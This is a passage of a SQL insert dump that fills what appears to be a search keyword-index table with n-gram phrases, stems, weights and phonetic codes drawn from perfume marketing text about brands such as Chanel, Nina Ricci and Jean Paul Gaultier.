wonderful',0,1,1.4667,'I253614',1,'en'),(21380,'is also','is also',0,1,1.2333,'I242',1,'en'),(21381,'is also the','is also the',0,1,1.3667,'I2423',1,'en'),(21382,'is an iconic','is an iconic',0,1,1.4,'I25252',1,'en'),(21383,'is both','is both',0,1,1.2333,'I213',1,'en'),(21384,'is both elegant','is both elegant',0,1,1.5,'I2134253',1,'en'),(21385,'is contains','is contains',0,1,1.3667,'I25352',1,'en'),(21386,'is contains tiger','is contains tiger',0,1,1.5667,'I25352326',1,'en'),(21387,'is nina','is nina',0,1,1.2333,'I250',1,'en'),(21388,'is nina ricci','is nina ricci',0,1,1.4333,'I2562',1,'en'),(21389,'is not a','is not a',0,1,1.2667,'I253',2,'en'),(21390,'is polo','is polo',0,1,1.2333,'I214',3,'en'),(21391,'is polo homepage','is polo homepage',0,1,1.5333,'I214512',1,'en'),(21392,'is representative','is representative',0,1,1.5667,'I26162531',1,'en'),(21393,'is representative of','is representative of',0,1,1.6667,'I26162531',1,'en'),(21394,'is sensual','is sensual',0,1,1.3333,'I2524',1,'en'),(21395,'is sensual and','is sensual and',0,1,1.4667,'I252453',1,'en'),(21396,'is the most','is the most',0,1,1.3667,'I23523',2,'en'),(21397,'is worn','is worn',0,1,1.2333,'I265',1,'en'),(21398,'is worn by','is worn by',0,1,1.3333,'I2651',1,'en'),(21399,'it again','it again',0,1,1.2667,'I325',1,'en'),(21400,'it again as','it again as',0,1,1.3667,'I3252',1,'en'),(21401,'it and sells','it and sells',0,1,1.4,'I353242',1,'en'),(21402,'it anywhere','it anywhere',0,1,1.3667,'I356',1,'en'),(21403,'it anywhere for','it anywhere for',0,1,1.5,'I35616',1,'en'),(21404,'it doesn\'t.5','it doesn',0,1,1.4,'I3253',1,'en'),(21405,'it doesn\'t.5 chanel','it doesn chanel',0,1,1.6333,'I3253254',1,'en'),(21406,'it has an','it has an',0,1,1.3,'I325',1,'en'),(21407,'it is','it is',0,1,1.1667,'I320',4,'en'),(21408,'it is the','it is the',0,1,1.3,'I323',3,'en'),(21409,'it mimics','it mimics',0,1,1.3,'I352',1,'en'),(21410,'it mimics a','it mimics a',0,1,1.3667,'I352',1,'en'),(21411,'it\'s fantastic','it fantastic',0,1,1.4667,'I32153232',1,'en'),(21412,'it\'s fantastic finish','it fantastic finish',0,1,1.7,'I32153232152',1,'en'),(21413,'its flower','it flower',0,1,1.3333,'I32146',1,'en'),(21414,'its flower top','it flower top',0,1,1.4667,'I3214631',1,'en'),(21415,'jasmine','jasmin',0,0,0.4667,'J500',1,'en'),(21416,'jasmine flower','jasmin flower',0,1,1.4667,'J5146',1,'en'),(21417,'jasmine flower petals','jasmin flower petals',0,1,1.7,'J51461342',1,'en'),(21418,'jasmine lily','jasmin lily',0,1,1.4,'J540',1,'en'),(21419,'jasmine lily of','jasmin lily of',0,1,1.5,'J541',1,'en'),(21420,'jasmine orange','jasmin orange',0,1,1.4667,'J5652',1,'en'),(21421,'jasmine orange floral','jasmin orange floral',0,1,1.7,'J56521464',1,'en'),(21422,'jasmine orris','jasmin orris',0,1,1.4333,'J562',1,'en'),(21423,'jasmine orris origin','jasmin orris origin',0,1,1.6667,'J562625',1,'en'),(21424,'jean','jean',0,0,0.2667,'J500',2,'en'),(21425,'jean paul','jean paul',0,1,1.3,'J514',1,'en'),(21426,'jean paul gaultier','jean paul gaultier',0,1,1.6,'J5142436',1,'en'),(21427,'jewel','jewel',0,0,0.3333,'J400',1,'en'),(21428,'jewel colored','jewel colored',0,1,1.4333,'J42463',1,'en'),(21429,'jewel colored venetian','jewel colored venetian',0,1,1.7333,'J424631535',1,'en'),(21430,'jimmy','jimmi',0,0,0.3333,'J500',1,'en'),(21431,'jimmy choo','jimmi choo',0,1,1.3333,'J520',1,'en'),(21432,'jimmy choo is','jimmi choo is',0,1,1.4333,'J520',1,'en'),(21433,'l du','l du',0,1,1.1333,'L300',2,'en'),(21434,'l du temps','l du temps',0,1,1.3333,'L3512',1,'en'),(21435,'ladies','ladi',0,0,0.4,'L320',2,'en'),(21436,'ladies love','ladi love',0,1,1.3667,'L3241',1,'en'),(21437,'ladies love this','ladi love this',0,1,1.5333,'L324132',1,'en'),(21438,'lasts','last',0,0,0.3333,'L232',1,'en'),(21439,'lasts all','last all',0,1,1.3,'L2324',1,'en'),(21440,'lasts all day','last all day',0,1,1.4333,'L23243',1,'en'),(21441,'launched','launch',0,0,0.5333,'L523',3,'en'),(21442,'launched by','launch by',0,1,1.3667,'L5231',1,'en'),(21443,'launched by coco','launch by coco',0,1,1.5333,'L52312',1,'en'),(21444,'launched in','launch in',0,1,1.3667,'L5235',1,'en'),(21445,'launched in 1993.it','launch in 1993.it',0,1,1.6333,'L52353',1,'en'),(21446,'lauren beauty','lauren beauty',0,1,1.4333,'L6513',1,'en'),(21447,'lauren beauty this','lauren beauty this',0,1,1.6,'L65132',1,'en'),(21448,'lauren outlet uk','lauren outlet uk',0,1,1.5333,'L653432',2,'en'),(21449,'leaves','leav',0,0,0.4,'L120',2,'en'),(21450,'leaves jasmine','leav jasmine',0,1,1.4667,'L125',1,'en'),(21451,'leaves jasmine flower','leav jasmine flower',0,1,1.7,'L125146',1,'en'),(21452,'leaves musk','leav musk',0,1,1.3667,'L1252',1,'en'),(21453,'leaves musk vanilla','leav musk vanilla',0,1,1.6333,'L1252154',1,'en'),(21454,'leaving','leav',0,0,0.4667,'L152',1,'en'),(21455,'leaving dark','leav dark',0,1,1.4,'L152362',1,'en'),(21456,'leaving dark red','leav dark red',0,1,1.5333,'L15236263',1,'en'),(21457,'light and','light and',0,1,1.3,'L2353',1,'en'),(21458,'light and fresh','light and fresh',0,1,1.5,'L2353162',1,'en'),(21459,'lily','lili',0,0,0.2667,'L000',1,'en'),(21460,'lily of','lili of',0,1,1.2333,'L100',1,'en'),(21461,'lily of the','lili of the',0,1,1.3667,'L130',1,'en'),(21462,'lily patchouli','lili patchouli',0,1,1.4667,'L1324',1,'en'),(21463,'lily patchouli oakmoss','lili patchouli oakmoss',0,1,1.7333,'L1324252',1,'en'),(21464,'lime','lime',0,0,0.2667,'L500',1,'en'),(21465,'lime ylang','lime ylang',0,1,1.3333,'L5452',1,'en'),(21466,'lime ylang ylang','lime ylang ylang',0,1,1.5333,'L5452452',1,'en'),(21467,'limited','limit',0,0,0.4667,'L530',2,'en'),(21468,'limited updates','limit updates',0,1,1.5,'L53132',1,'en'),(21469,'limited updates this','limit updates this',0,1,1.6667,'L5313232',1,'en'),(21470,'linden','linden',0,0,0.4,'L535',1,'en'),(21471,'linden oil','linden oil',0,1,1.3333,'L5354',1,'en'),(21472,'linden oil teal','linden oil teal',0,1,1.5,'L535434',1,'en'),(21473,'list of','list of',0,1,1.2333,'L231',2,'en'),(21474,'list of 10','list of 10',0,1,1.3333,'L231',1,'en'),(21475,'live','live',0,0,0.2667,'L100',3,'en'),(21476,'live testified','live testified',0,1,1.4667,'L132313',1,'en'),(21477,'live testified how','live testified how',0,1,1.6,'L132313',1,'en'),(21478,'loans','loan',0,0,0.3333,'L520',1,'en'),(21479,'loans ernest','loan ernest',0,1,1.4,'L526523',1,'en'),(21480,'loans ernest beaux','loan ernest beaux',0,1,1.6,'L52652312',1,'en'),(21481,'location','locat',0,0,0.5333,'L235',2,'en'),(21482,'location 1.chanel','locat 1.chanel',0,1,1.5667,'L235254',1,'en'),(21483,'location 1.chanel it','locat 1.chanel it',0,1,1.6667,'L2352543',1,'en'),(21484,'look or','look or',0,1,1.2333,'L260',1,'en'),(21485,'look or serves','look or serves',0,1,1.4667,'L262612',1,'en'),(21486,'lot of women','lot of women',0,1,1.4,'L315',1,'en'),(21487,'lotus','lotu',0,0,0.3333,'L320',1,'en'),(21488,'lotus wedding','lotu wedding',0,1,1.4333,'L32352',1,'en'),(21489,'lotus wedding plants','lotu wedding plants',0,1,1.6667,'L3235214532',1,'en'),(21490,'love','love',0,0,0.2667,'L100',3,'en'),(21491,'love story','love story',0,1,1.3333,'L1236',1,'en'),(21492,'love story in','love story in',0,1,1.4333,'L12365',1,'en'),(21493,'love this','love this',0,1,1.3,'L132',1,'en'),(21494,'love this light','love this light',0,1,1.5,'L132423',1,'en'),(21495,'love this scented','love this scented',0,1,1.5667,'L13253',1,'en'),(21496,'love to','love to',0,1,1.2333,'L130',1,'en'),(21497,'love to wear','love to wear',0,1,1.4,'L136',1,'en'),(21498,'loved','love',0,0,0.3333,'L130',2,'en'),(21499,'loved by','love by',0,1,1.2667,'L131',1,'en'),(21500,'loved by women','love by women',0,1,1.4667,'L1315',1,'en'),(21501,'made in','made in',0,1,1.2333,'M350',1,'en'),(21502,'made in france','made in france',0,1,1.4667,'M351652',1,'en'),(21503,'makes millions','make millions',0,1,1.4667,'M25452',1,'en'),(21504,'makes millions per','make millions per',0,1,1.6,'M2545216',1,'en'),(21505,'many and','mani and',0,1,1.2667,'M300',1,'en'),(21506,'many and makes','mani and makes',0,1,1.4667,'M352',1,'en'),(21507,'many celebrities','mani celebrities',0,1,1.5333,'M241632',1,'en'),(21508,'many celebrities including','mani celebrities including',0,1,1.8667,'M241632524352',1,'en'),(21509,'many compliments','mani compliments',0,1,1.5333,'M2514532',1,'en'),(21510,'many compliments from','mani compliments from',0,1,1.7,'M2514532165',1,'en'),(21511,'many crystal','mani crystal',0,1,1.4,'M26234',1,'en'),(21512,'many crystal encrusted','mani crystal encrusted',0,1,1.7333,'M2623452623',1,'en'),(21513,'many for','mani for',0,1,1.2667,'M160',1,'en'),(21514,'many for women','mani for women',0,1,1.4667,'M165',1,'en'),(21515,'many ladies','mani ladies',0,1,1.3667,'M432',1,'en'),(21516,'many ladies love','mani ladies love',0,1,1.5333,'M43241',1,'en'),(21517,'many women','mani women',0,1,1.3333,'M000',2,'en'),(21518,'many women who','mani women who',0,1,1.4667,'M000',1,'en'),(21519,'marigold','marigold',0,0,0.5333,'M6243',1,'en'),(21520,'marigold cinnamon','marigold cinnamon',0,1,1.5667,'M624325',1,'en'),(21521,'marigold cinnamon linden','marigold cinnamon linden',0,1,1.8,'M6243254535',1,'en'),(21522,'marilyn','marilyn',0,0,0.4667,'M645',1,'en'),(21523,'marilyn monroe','marilyn monroe',0,1,1.4667,'M6456',1,'en'),(21524,'marilyn monroe daisy','marilyn monroe daisy',0,1,1.6667,'M645632',1,'en'),(21525,'matches','match',0,0,0.4667,'M320',1,'en'),(21526,'matches the','match the',0,1,1.3667,'M323',1,'en'),(21527,'matches the scent','match the scent',0,1,1.5667,'M323253',1,'en'),(21528,'me up','me up',0,1,1.1667,'M100',1,'en'),(21529,'me up here','me up here',0,1,1.3333,'M160',1,'en'),(21530,'mellon','mellon',0,0,0.4,'M450',1,'en'),(21531,'mellon created','mellon created',0,1,1.4667,'M45263',1,'en'),(21532,'mellon created a','mellon created a',0,1,1.5333,'M45263',1,'en'),(21533,'men','men',0,0,0.2,'M000',4,'en'),(21534,'men this','men this',0,1,1.2667,'M320',1,'en'),(21535,'men this is','men this is',0,1,1.3667,'M320',1,'en'),(21536,'men to','men to',0,1,1.2,'M300',2,'en'),(21537,'men to get','men to get',0,1,1.3333,'M323',1,'en'),(21538,'millions','million',0,0,0.5333,'M452',1,'en'),(21539,'millions per','million per',0,1,1.4,'M45216',1,'en'),(21540,'millions per year','million per year',0,1,1.5667,'M45216',1,'en'),(21541,'mimics','mimic',0,0,0.4,'M200',1,'en'),(21542,'mimics a','mimic a',0,1,1.2667,'M200',1,'en'),(21543,'mimics a girly','mimic a girly',0,1,1.4667,'M264',1,'en'),(21544,'modern woman','modern woman',0,1,1.4,'M365',1,'en'),(21545,'modern woman it','modern woman it',0,1,1.5,'M3653',1,'en'),(21546,'monroe','monro',0,0,0.4,'M600',1,'en'),(21547,'monroe daisy','monro daisy',0,1,1.4,'M632',1,'en'),(21548,'monroe daisy is','monro daisy is',0,1,1.5,'M632',1,'en'),(21549,'most famous','most famous',0,1,1.3667,'M23152',1,'en'),(21550,'most famous perfume','most famous perfume',0,1,1.6333,'M231521615',1,'en'),(21551,'murano','murano',0,0,0.4,'M650',1,'en'),(21552,'murano glass','murano glass',0,1,1.4,'M65242',1,'en'),(21553,'murano glass and','murano glass and',0,1,1.5333,'M6524253',1,'en'),(21554,'musk','musk',0,0,0.2667,'M200',1,'en'),(21555,'musk this','musk this',0,1,1.3,'M232',1,'en'),(21556,'musk this perfume','musk this perfume',0,1,1.5667,'M2321615',1,'en'),(21557,'musk vanilla','musk vanilla',0,1,1.4,'M2154',1,'en'),(21558,'musk vanilla flavouring','musk vanilla flavouring',0,1,1.7667,'M2154141652',1,'en'),(21559,'nectar','nectar',0,0,0.4,'N236',1,'en'),(21560,'nectar sweet','nectar sweet',0,1,1.4,'N23623',1,'en'),(21561,'nectar sweet chinese','nectar sweet chinese',0,1,1.6667,'N23623252',1,'en'),(21562,'nicely','nice',0,0,0.4,'N240',1,'en'),(21563,'nicely featuring','nice featuring',0,1,1.5333,'N2413652',1,'en'),(21564,'nicely featuring its','nice featuring its',0,1,1.6667,'N241365232',1,'en'),(21565,'nina','nina',0,0,0.2667,'N000',1,'en'),(21566,'nina ricci','nina ricci',0,1,1.3333,'N620',1,'en'),(21567,'nina ricci house','nina ricci house',0,1,1.5333,'N620',1,'en'),(21568,'nina ricci most','nina ricci most',0,1,1.5,'N62523',1,'en'),(21569,'nina ricci this','nina ricci this',0,1,1.5,'N6232',1,'en'),(21570,'not a boring','not a boring',0,1,1.4,'N31652',1,'en'),(21571,'not online','not online',0,1,1.3333,'N3545',1,'en'),(21572,'not online perfume','not online perfume',0,1,1.6,'N35451615',1,'en'),(21573,'not too','not too',0,1,1.2333,'N300',1,'en'),(21574,'not too serious','not too serious',0,1,1.5,'N3262',1,'en'),(21575,'notes','note',0,0,0.3333,'N320',1,'en'),(21576,'notes of','note of',0,1,1.2667,'N321',1,'en'),(21577,'notes of blood','note of blood',0,1,1.4667,'N32143',1,'en'),(21578,'notes of peach','note of peach',0,1,1.4667,'N3212',1,'en'),(21579,'notes of rum','note of rum',0,1,1.4,'N32165',1,'en'),(21580,'notes of sungoddess','note of sungoddess',0,1,1.6333,'N32125232',1,'en'),(21581,'notes the','note the',0,1,1.3,'N323',1,'en'),(21582,'notes the brand','note the brand',0,1,1.5,'N3231653',1,'en'),(21583,'oakmoss','oakmoss',0,0,0.4667,'O252',1,'en'),(21584,'oakmoss and','oakmoss and',0,1,1.3667,'O25253',1,'en'),(21585,'oakmoss and consequently','oakmoss and consequently',0,1,1.8,'O25253252534',1,'en'),(21586,'occasion','occas',0,0,0.5333,'O250',2,'en'),(21587,'occasion 7.giorgio','occas 7.giorgio',0,1,1.6,'O25262',1,'en'),(21588,'occasion 7.giorgio armani','occas 7.giorgio armani',0,1,1.8333,'O2526265',1,'en'),(21589,'of 10','of 10',0,1,1.1667,'O100',2,'en'),(21590,'of 10 popular','of 10 popular',0,1,1.4333,'O146',1,'en'),(21591,'of blood','of blood',0,1,1.2667,'O143',1,'en'),(21592,'of blood orange','of blood orange',0,1,1.5,'O143652',1,'en'),(21593,'of blood violet','of blood violet',0,1,1.5,'O143143',1,'en'),(21594,'of himself','of himself',0,1,1.3333,'O15241',1,'en'),(21595,'of himself into','of himself into',0,1,1.5,'O1524153',1,'en'),(21596,'of peace','of peace',0,1,1.2667,'O120',1,'en'),(21597,'of peace wholesomeness','of peace wholesomeness',0,1,1.7333,'O124252',1,'en'),(21598,'of peach','of peach',0,1,1.2667,'O120',1,'en'),(21599,'of peach carnation','of peach carnation',0,1,1.6,'O126535',1,'en'),(21600,'of ralph','of ralph',0,1,1.2667,'O1641',2,'en'),(21601,'of ralph lauren','of ralph lauren',0,1,1.5,'O1641465',2,'en'),(21602,'of rum','of rum',0,1,1.2,'O165',1,'en'),(21603,'of rum essence','of rum essence',0,1,1.4667,'O165252',1,'en'),(21604,'of sungoddess','of sungoddess',0,1,1.4333,'O125232',1,'en'),(21605,'of sungoddess rose','of sungoddess rose',0,1,1.6,'O12523262',1,'en'),(21606,'of the area','of the area',0,1,1.3667,'O136',1,'en'),(21607,'of the modern','of the modern',0,1,1.4333,'O135365',1,'en'),(21608,'of this perfume','of this perfume',0,1,1.5,'O1321615',1,'en'),(21609,'of women','of women',0,1,1.2667,'O150',1,'en'),(21610,'of women worldwide','of women worldwide',0,1,1.6,'O15643',1,'en'),(21611,'off a','off a',0,1,1.1667,'O100',1,'en'),(21612,'off a look','off a look',0,1,1.3333,'O142',1,'en'),(21613,'officer','offic',0,0,0.4667,'O126',2,'en'),(21614,'officer tamara','offic tamara',0,1,1.4667,'O126356',1,'en'),(21615,'officer tamara mellon','offic tamara mellon',0,1,1.7,'O126356545',1,'en'),(21616,'oil','oil',0,0,0.2,'O400',1,'en'),(21617,'oil teal','oil teal',0,1,1.2667,'O434',1,'en'),(21618,'oil teal freesia','oil teal freesia',0,1,1.5333,'O434162',1,'en'),(21619,'online perfume','onlin perfume',0,1,1.4667,'O5451615',1,'en'),(21620,'online perfume has','onlin perfume has',0,1,1.6,'O54516152',1,'en'),(21621,'or serves','or serves',0,1,1.3,'O62612',1,'en'),(21622,'or serves as','or serves as',0,1,1.4,'O62612',1,'en'),(21623,'or service','or service',0,1,1.3333,'O62612',1,'en'),(21624,'or service values','or service values',0,1,1.5667,'O62612142',1,'en'),(21625,'orange','orang',0,0,0.4,'O652',1,'en'),(21626,'orange floral','orang floral',0,1,1.4333,'O6521464',1,'en'),(21627,'orange floral seringa','orang floral seringa',0,1,1.7,'O65214642652',1,'en'),(21628,'orange ginger','orang ginger',0,1,1.4333,'O652526',1,'en'),(21629,'orange ginger herb','orang ginger herb',0,1,1.6,'O6525261',1,'en'),(21630,'orange toffee','orang toffee',0,1,1.4333,'O65231',1,'en'),(21631,'orange toffee indonesian','orang toffee indonesian',0,1,1.8,'O6523153525',1,'en'),(21632,'orchard','orchard',0,0,0.4667,'O6263',1,'en'),(21633,'orchard pear','orchard pear',0,1,1.4,'O626316',1,'en'),(21634,'orchard pear nectar','orchard pear nectar',0,1,1.6333,'O6263165236',1,'en'),(21635,'orchid','orchid',0,0,0.4,'O623',1,'en'),(21636,'orchid cloves','orchid cloves',0,1,1.4333,'O6232412',1,'en'),(21637,'orchid cloves jasmine','orchid cloves jasmine',0,1,1.7,'O62324125',1,'en'),(21638,'orchid daffodil','orchid daffodil',0,1,1.5,'O623134',1,'en'),(21639,'orchid daffodil bourbon','orchid daffodil bourbon',0,1,1.7667,'O6231341615',1,'en'),(21640,'oriental','orient',0,0,0.5333,'O6534',1,'en'),(21641,'oriental scent','orient scent',0,1,1.4667,'O6534253',1,'en'),(21642,'oriental scent that','orient scent that',0,1,1.6333,'O6534253',1,'en'),(21643,'origin','origin',0,0,0.4,'O625',1,'en'),(21644,'origin eye','origin eye',0,1,1.3333,'O625',1,'en'),(21645,'origin eye designer','origin eye designer',0,1,1.6333,'O6253256',1,'en'),(21646,'orris','orri',0,0,0.3333,'O620',1,'en'),(21647,'orris origin','orri origin',0,1,1.4,'O62625',1,'en'),(21648,'orris origin eye','orri origin eye',0,1,1.5333,'O62625',1,'en'),(21649,'out sensual','out sensual',0,1,1.3667,'O32524',1,'en'),(21650,'out sensual charm','out sensual charm',0,1,1.5667,'O32524265',1,'en'),(21651,'out this','out this',0,1,1.2667,'O320',1,'en'),(21652,'out this brand','out this brand',0,1,1.4667,'O321653',1,'en'),(21653,'outlet uk','outlet uk',0,1,1.3,'O3432',2,'en'),(21654,'outlet uk robert','outlet uk robert',0,1,1.5333,'O34326163',1,'en'),(21655,'package','packag',0,0,0.4667,'P200',1,'en'),(21656,'pages 7','page 7',0,1,1.2333,'P200',1,'en'),(21657,'parfum','parfum',0,0,0.4,'P615',2,'en'),(21658,'parfum launched','parfum launched',0,1,1.5,'P6154523',1,'en'),(21659,'parfum launched in','parfum launched in',0,1,1.6,'P61545235',1,'en'),(21660,'passion','passion',0,0,0.4667,'P250',1,'en'),(21661,'passion and','passion and',0,1,1.3667,'P253',1,'en'),(21662,'passion and elegance','passion and elegance',0,1,1.6667,'P2534252',1,'en'),(21663,'patchouli','patchouli',0,0,0.6,'P324',1,'en'),(21664,'patchouli and','patchouli and',0,1,1.4333,'P32453',1,'en'),(21665,'patchouli and spicey','patchouli and spicey',0,1,1.6667,'P32453212',1,'en'),(21666,'patchouli oakmoss','patchouli oakmoss',0,1,1.5667,'P324252',1,'en'),(21667,'patchouli oakmoss and','patchouli oakmoss and',0,1,1.7,'P32425253',1,'en'),(21668,'paul','paul',0,0,0.2667,'P400',1,'en'),(21669,'paul gaultier','paul gaultier',0,1,1.4333,'P42436',1,'en'),(21670,'paul gaultier first','paul gaultier first',0,1,1.6333,'P424361623',1,'en'),(21671,'paul gaultier is','paul gaultier is',0,1,1.5333,'P424362',1,'en'),(21672,'peace','peac',0,0,0.3333,'P200',2,'en'),(21673,'peace wholesomeness','peac wholesomeness',0,1,1.6333,'P24252',1,'en'),(21674,'peace wholesomeness autonomy','peac wholesomeness autonomy',0,1,1.9333,'P2425235',1,'en'),(21675,'peach','peach',0,0,0.3333,'P200',1,'en'),(21676,'peach carnation','peach carnation',0,1,1.5,'P26535',1,'en'),(21677,'peach carnation bergamot','peach carnation bergamot',0,1,1.8,'P2653516253',1,'en'),(21678,'pear','pear',0,0,0.2667,'P600',1,'en'),(21679,'pear nectar','pear nectar',0,1,1.3667,'P65236',1,'en'),(21680,'pear nectar sweet','pear nectar sweet',0,1,1.5667,'P6523623',1,'en'),(21681,'pear sorbet','pear sorbet',0,1,1.3667,'P62613',1,'en'),(21682,'pear sorbet sambac','pear sorbet sambac',0,1,1.6,'P626132512',1,'en'),(21683,'peppermint','peppermint',0,0,0.6667,'P653',1,'en'),(21684,'peppermint gardenia','peppermint gardenia',0,1,1.6333,'P6532635',1,'en'),(21685,'peppermint gardenia orchid','peppermint gardenia orchid',0,1,1.8667,'P6532635623',1,'en'),(21686,'per year','per year',0,1,1.2667,'P600',1,'en'),(21687,'per year this','per year this',0,1,1.4333,'P632',1,'en'),(21688,'perfect','perfect',0,0,0.4667,'P6123',1,'en'),(21689,'perfect gift','perfect gift',0,1,1.4,'P6123213',1,'en'),(21690,'perfect gift for','perfect gift for',0,1,1.5333,'P612321316',1,'en'),(21691,'perfume','perfum',0,0,0.4667,'P615',1,'en'),(21692,'perfume and','perfum and',0,1,1.3667,'P6153',1,'en'),(21693,'perfume and the','perfum and the',0,1,1.5,'P6153',1,'en'),(21694,'perfume bottle','perfum bottle',0,1,1.4667,'P615134',1,'en'),(21695,'perfume bottle it','perfum bottle it',0,1,1.5667,'P6151343',1,'en'),(21696,'perfume from','perfum from',0,1,1.4,'P615165',1,'en'),(21697,'perfume from the','perfum from the',0,1,1.5333,'P6151653',1,'en'),(21698,'perfume has','perfum has',0,1,1.3667,'P6152',1,'en'),(21699,'perfume has aldehydes','perfum has aldehydes',0,1,1.7,'P6152432',1,'en'),(21700,'perfume has amazing','perfum has amazing',0,1,1.6333,'P61525252',1,'en'),(21701,'perfume has been','perfum has been',0,1,1.5333,'P615215',1,'en'),(21702,'perfume here','perfum here',0,1,1.4,'P6156',1,'en'),(21703,'perfume here first','perfum here first',0,1,1.6,'P61561623',1,'en'),(21704,'perfume in','perfum in',0,1,1.3333,'P615',1,'en'),(21705,'perfume in the','perfum in the',0,1,1.4667,'P6153',1,'en'),(21706,'perfume is','perfum is',0,1,1.3333,'P6152',1,'en'),(21707,'perfume is a','perfum is a',0,1,1.4,'P6152',1,'en'),(21708,'perfume is both','perfum is both',0,1,1.5,'P615213',1,'en'),(21709,'perfume launched','perfum launched',0,1,1.5333,'P6154523',1,'en'),(21710,'perfume launched by','perfum launched by',0,1,1.6333,'P61545231',1,'en'),(21711,'perfume matches','perfum matches',0,1,1.5,'P61532',1,'en'),(21712,'perfume matches the','perfum matches the',0,1,1.6333,'P615323',1,'en'),(21713,'perfume perfume','perfum perfume',0,1,1.5,'P6151615',1,'en'),(21714,'perfume perfume is','perfum perfume is',0,1,1.6,'P61516152',1,'en'),(21715,'perfume that','perfum that',0,1,1.4,'P6153',1,'en'),(21716,'perfume that has','perfum that has',0,1,1.5333,'P61532',1,'en'),(21717,'perfume that is','perfum that is',0,1,1.5,'P61532',1,'en'),(21718,'perfume that many','perfum that many',0,1,1.5667,'P61535',1,'en'),(21719,'perfume this','perfum this',0,1,1.4,'P61532',1,'en'),(21720,'perfume this scented','perfum this scented',0,1,1.6667,'P6153253',1,'en'),(21721,'perfume was','perfum was',0,1,1.3667,'P6152',1,'en'),(21722,'perfume was jean','perfum was jean',0,1,1.5333,'P61525',1,'en'),(21723,'perfume was made','perfum was made',0,1,1.5333,'P615253',1,'en'),(21724,'perfumer','perfum',0,0,0.5333,'P6156',1,'en'),(21725,'perfumer francis','perfum francis',0,1,1.5333,'P61561652',1,'en'),(21726,'perfumer francis fabron','perfum francis fabron',0,1,1.7667,'P61561652165',1,'en'),(21727,'perfumes','perfum',0,0,0.5333,'P6152',1,'en'),(21728,'perfumes loved','perfum loved',0,1,1.4667,'P6152413',1,'en'),(21729,'perfumes loved by','perfum loved by',0,1,1.5667,'P61524131',1,'en'),(21730,'petals','petal',0,0,0.4,'P342',1,'en'),(21731,'petals and','petal and',0,1,1.3333,'P34253',1,'en'),(21732,'petals and leaves','petal and leaves',0,1,1.5667,'P34253412',1,'en'),(21733,'pick me','pick me',0,1,1.2333,'P250',1,'en'),(21734,'pick me up','pick me up',0,1,1.3333,'P251',1,'en'),(21735,'plants','plant',0,0,0.4,'P4532',1,'en'),(21736,'plants day','plant day',0,1,1.3333,'P45323',1,'en'),(21737,'plants day lily','plant day lily',0,1,1.5,'P453234',1,'en'),(21738,'pleasant','pleasant',0,0,0.5333,'P4253',1,'en'),(21739,'pleasant amber','pleasant amber',0,1,1.4667,'P4253516',1,'en'),(21740,'pleasant amber sandalwood','pleasant amber sandalwood',0,1,1.8333,'P425351625343',1,'en'),(21741,'polo homepage','polo homepage',0,1,1.4333,'P4512',1,'en'),(21742,'polo homepage a','polo homepage a',0,1,1.5,'P4512',1,'en'),(21743,'popular perfume','popular perfume',0,1,1.5,'P461615',1,'en'),(21744,'popular perfume perfume','popular perfume perfume',0,1,1.7667,'P4616151615',1,'en'),(21745,'popular perfumes','popular perfumes',0,1,1.5333,'P4616152',1,'en'),(21746,'popular perfumes loved','popular perfumes loved',0,1,1.7333,'P4616152413',1,'en'),(21747,'pour','pour',0,0,0.2667,'P600',1,'en'),(21748,'pour femme','pour femme',0,1,1.3333,'P615',1,'en'),(21749,'pour femme has','pour femme has',0,1,1.4667,'P6152',1,'en'),(21750,'preferences','prefer',0,0,0.7333,'P61652',2,'en'),(21751,'preferences the','prefer the',0,1,1.5,'P616523',1,'en'),(21752,'preferences the bottle','prefer the bottle',0,1,1.7333,'P616523134',1,'en'),(21753,'preferred','prefer',0,0,0.6,'P6163',3,'en'),(21754,'preferred and','prefer and',0,1,1.4333,'P616353',1,'en'),(21755,'preferred and classic','prefer and classic',0,1,1.7,'P616353242',1,'en'),(21756,'product','product',0,0,0.4667,'P6323',2,'en'),(21757,'product or','product or',0,1,1.3333,'P63236',1,'en'),(21758,'product or service','product or service',0,1,1.6,'P632362612',1,'en'),(21759,'progressed','progress',0,0,0.6667,'P62623',1,'en'),(21760,'progressed jean','progress jean',0,1,1.5,'P6262325',1,'en'),(21761,'progressed jean paul','progress jean paul',0,1,1.6667,'P626232514',1,'en'),(21762,'re','re',0,0,0.1333,'R000',1,'en'),(21763,'re dresses','re dresses',0,1,1.3333,'R362',1,'en'),(21764,'re dresses the','re dresses the',0,1,1.4667,'R3623',1,'en'),(21765,'red grapefruit','red grapefruit',0,1,1.4667,'R326163',1,'en'),(21766,'red grapefruit gardenia','red grapefruit gardenia',0,1,1.7667,'R3261632635',1,'en'),(21767,'red red','red red',0,1,1.2333,'R363',1,'en'),(21768,'red red grapefruit','red red grapefruit',0,1,1.6,'R36326163',1,'en'),(21769,'refinement','refin',0,0,0.6667,'R153',1,'en'),(21770,'refinement from','refin from',0,1,1.5,'R153165',1,'en'),(21771,'refinement from the','refin from the',0,1,1.6333,'R1531653',1,'en'),(21772,'reflects','reflect',0,0,0.5333,'R14232',1,'en'),(21773,'reflects the','reflect the',0,1,1.4,'R142323',1,'en'),(21774,'reflects the product','reflect the product',0,1,1.6667,'R14232316323',1,'en'),(21775,'representative','repres',0,0,0.9333,'R162531',1,'en'),(21776,'representative of','repres of',0,1,1.5667,'R162531',1,'en'),(21777,'representative of the','repres of the',0,1,1.7,'R1625313',1,'en'),(21778,'represented','repres',0,0,0.7333,'R16253',1,'en'),(21779,'represented her','repres her',0,1,1.5,'R162536',1,'en'),(21780,'represented her preferences','repres her preferences',0,1,1.9,'R162536161652',1,'en'),(21781,'ricci','ricci',0,0,0.3333,'R200',1,'en'),(21782,'ricci and','ricci and',0,1,1.3,'R253',1,'en'),(21783,'ricci and perfumer','ricci and perfumer',0,1,1.6,'R25316156',1,'en'),(21784,'ricci house','ricci house',0,1,1.3667,'R200',1,'en'),(21785,'ricci house acquiring','ricci house acquiring',0,1,1.7,'R2652',1,'en'),(21786,'ricci most','ricci most',0,1,1.3333,'R2523',1,'en'),(21787,'ricci most famous','ricci most famous',0,1,1.5667,'R2523152',1,'en'),(21788,'ricci this','ricci this',0,1,1.3333,'R232',1,'en'),(21789,'ricci this floral','ricci this floral',0,1,1.5667,'R2321464',1,'en'),(21790,'robert','robert',0,0,0.4,'R163',4,'en'),(21791,'robert gaultier','robert gaultier',0,1,1.5,'R1632436',1,'en'),(21792,'robert gaultier classique','robert gaultier classique',0,1,1.8333,'R1632436242',1,'en'),(21793,'robert ricci','robert ricci',0,1,1.4,'R16362',1,'en'),(21794,'robert ricci and','robert ricci 